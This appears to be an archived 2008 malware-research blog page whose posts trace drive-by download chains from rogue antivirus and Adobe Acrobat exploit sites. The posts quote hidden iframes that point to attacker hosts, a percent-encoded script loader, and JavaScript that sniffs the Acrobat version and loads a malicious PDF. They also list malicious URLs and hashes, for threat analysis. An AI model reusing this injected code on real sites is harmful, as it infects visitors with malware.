Archive for the 'IFRAME' Category

13
Oct

Internet Exploitation Adventure

By djpnuemo Comments
Categories: Database Update, IFRAME, Investigated, Rogue, Rogue Anti-Malware, Rogue Software and Vulnerabilities

This post shows the lengths people will go to in order install malware onto computers. We will show how visiting one website will take you on a journey to many websites that will check your computer for vulnerable software and if found, will install malware on your computer.

First, there is a list of the domains involved in the exploit adventure. Simply visiting hxxp://defendmycreditunion.org will start this process. Then hidden iframes are loaded with websites scanning your computer for vulnerabilities and if it can’t, redirect you somewhere else. These websites are still active so proceed at your own risk.

The links on this page DO NOT link to the infected website. They are anchored links further down the page to view the analysis easier. The links just below are listed in the approximate order in which they load would while exploiting the machine.

BE ADVISED: The actual domains may still be active. Proceed at your own risk!

Picture below shows visual map of how pages are loaded.

Continue reading ‘Internet Exploitation Adventure’

04
Oct

Another Adobe Acrobat Exploit (accwizm.exe)-VIDEO

By djpnuemo Comments
Categories: Database Update, IFRAME, Malicious Links, Malware, Video and Vulnerabilities

Once again, we have an Adobe exploit page injecting another piece of malware. This one is different than the one posted earlier and this one redirects through multiple pages logging each visitor. I was able to capture a video of the computer being exploited simply by visiting the page. As with the previous exploit, the binary installed is almost fully undetected except for a few heuristic catches. Look below for more information about this exploit and information about the binary. It can be downloaded from /pnuemo-malware/ in our repository.

BE ADVISED: All sites my be active. Proceed at your own risk.

The user will visit the following URL: hxxp://66.232.117.33/~catetc/tdsHAX/kotopoucykanety.php

This pages contains a simple hidden iframe that will load multiple pages logging each visitor how visits.

<iframe src=”http://megsrdomain.cn/tor/count.php?o=5″ width=1 height=1 style=”visibility: hidden”></iframe>

In the iframe we are redirected two times until we reach the exploit page.

hxxp://megsrdomain.cn/tor/count.php?o=5 -> hxxp://megsrdomain.cn/tor/count.php?o=2 -> hxxp://82.103.138.10/ls/?t=24

hxxp://82.103.138.10/ls/?t=24 is the page that exploits Adobe Acrobat and installs the malware. This page contains many, many pages of code and there is too much to post here. You can view or download a clean .txt of the page code for this exploit by clicking here.

accwizm.exe
Result: 8/36 (22.22%)
MD5: 2bee943c7b8e63d17a92b99087ba15a7
VirusTotal
Sunbelt Sandbox

Download Video

31
Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

By djpnuemo Comments
Categories: Antivirus 2008, Database Update, IFRAME, MalSpam, Malicious Links, Malware, Rogue Software and Vulnerabilities

This morning we’ve found a website that automatically loads an infected pdf file.

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

User visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included

<script language=”javascript”>document.write(unescape(’%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E’));</script>

when deobfuscated…

<iframe src=”http://69.46.27.41/afxv/tpv/index.php” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

We can see the hidden iframe above and the page includes the following code…

<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
re=/.d.{2}e.A.{2}o…..l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+’.'+res[2]+’.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
ppdf=ppdf.replace(/\D/g,”");
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;if(ppdfenable)
{
document.write(’<iframe width=1 height=1 src=”hxxp://69.46.27.41/afxv/tpv/gnu.pdf”></iframe>’);
}
}
</script>

Thus leading us to the pdf in question located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. This is also available in /pnuemo-malware/.

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

29
Aug

XP Antivirus 2008 IFRAME update

By lithium Comments
Categories: Antivirus XP 2008, Database Update and IFRAME

While stepping through malicious domains I noticed that the “International Virus Research Lab” (IVRL) pages for XP Antivirus 2008 had changed hashes. I was looking at  hxxp://bestantivirus2009.com at the time and noticed the inclusion of an IFRAME pointing to hxxp://huytegygle.com/index.php.

iframe

I took a look at the IFRAME and found the following obfuscated javascript.

obfuscatedjscode

After attempting a few exploits the code eventually leads us to hxxp://huytegygle.com/bin/file.exe which has a low (7/36 and mostly heuristic) detection rate @ VirusTotal.  The file has been made available inside /lithium-malware/.

File: file.exe [ThreatExpert]
File size: 8192 bytes
MD5…: a2a6455a4da0192fb8efe85e98fd3dfa
SHA1..: a9a65198cf692a306be1e23c9e965549b7294b26
SHA256: 92255343407bf219f094bec01ac7750cf82869741d6fb5c27967624ce0e6bc80
SHA512: 2b9a1c7b33e80bdfc213be9d3dfbeb7491ede790045c5aec15ec55bd686c9787
d2b19420f8058286c286375db2bee84e55d101c42f99a03a92010691e0b8eeb9
PEiD..: -

Malware Database Forum



Click for

Malware Removal Information



Special Deals


$20 Off Panda Internet Security 2009

 

December 2008
M T W T F S S
« Nov    
1234567
891011121314
15161718192021
22232425262728
293031  

Support Malware Database!


Security Engineering: A Guide to Building Dependable Distributed Systems

Reversing: Secrets of Reverse Engineering

Crimeware: Understanding New Attacks and Defenses (Symantec Press)

Security Power Tools

IT Security Interviews Exposed: Secrets to Landing Your Next Information Security Job

Windows Command-Line Administrator's Pocket Consultant, 2nd Edition

CompTIA Security+ Certification Kit